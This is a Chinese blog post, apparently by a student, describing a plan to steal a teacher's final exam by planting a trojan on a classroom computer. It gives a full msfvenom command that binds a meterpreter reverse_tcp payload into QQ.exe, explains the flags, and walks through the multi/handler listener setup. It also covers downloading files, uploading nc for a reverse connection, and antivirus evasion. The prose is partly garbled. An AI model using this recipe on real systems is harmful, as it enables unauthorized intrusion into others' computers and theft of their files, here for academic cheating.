每个故事的开头总是那么荒谬和奇怪。对于一个技术小孟新来说,因为期末考试快到了,他知道自己通常是什么样的(狗头)。
在一个寒冷的下午,我在课堂上刷手机(当然,我不能在这里向我学习),然后我看到了官方账户的推文。这是一篇关于通过写一个木马程序窃取老师期末试卷的文章。此时,我心中也有类似的想法,嘻嘻。通过作者的想法,作者写了自己的程序,等待着老师u插盘,然后遍历老师u指定的文件格式到自己的文件格式u盘。
经过一番思考,决定现学现用。msf生成的小马植入教室的计算机,然后获得目标计算机的权限里有两个想法:
1.在老师来之前,他把马植入电脑中,然后在课后自动销毁,但这有点危险,一些学生会看到。或者在入侵老师的电脑后上传nc然后反连。
2.还有自己的远程控制软件(狗头,不是本文的重点),重点是免杀。
Msf我们应该熟悉它。关键是如何捆绑或生成小马。本文介绍了捆绑。首先,我们必须有一个目标软件。
然后执行命令
sfvenom -p
windows/meterpreter/reverse_tcp LHOST=192.168.44.141 -f exe -x /home/zhengai/桌面/QQ.exe -o /home/zhengai/桌面/test.exe
-p指的是使用payload
-f 是指输出的文件格式
-x -o 是指输入文件路径和输出文件路径
LHOST=你自己的IP
这个时候可能会有帅气的读者问,就这样裸奔吗?你不怕被杀吗?
当然,我们有免杀(狗头)。
假如你觉得麻烦想自己生小马,想法也一样,只是直接去掉-x当然,参数msf手机也集成了payload,如果你感兴趣,你可以试试。实践前我们先做实验。
Msfconsole打开msf端
use multi/handler可先进入模块
然后show options检查需要配置的参数
这里只需要配置LHOST,这里有两种配置方法,可以是自己的ip,也可以是目标主机的ip但是这匹马只能在局域网上上线,不同ip配置可以获得不同的权限。这里我们直接配置目标主机ip。
最最最重要的是目标主机要运行你的小马,在实践中你可以有很多方法让目标主机运行,看你的能力了。然后我们就可以执行命令下载文件了。下载命令是download .更多有趣的命令等着你去挖掘。目标主机也可以上传到这里nc然后这是你的电脑。我们的目标是注册表,
OK现在你只需要连接(狗头)。
但最终的计划还是失败了,因为只有老师才能打开教室的电脑。吐血。(打字不容易,老板喷轻一点)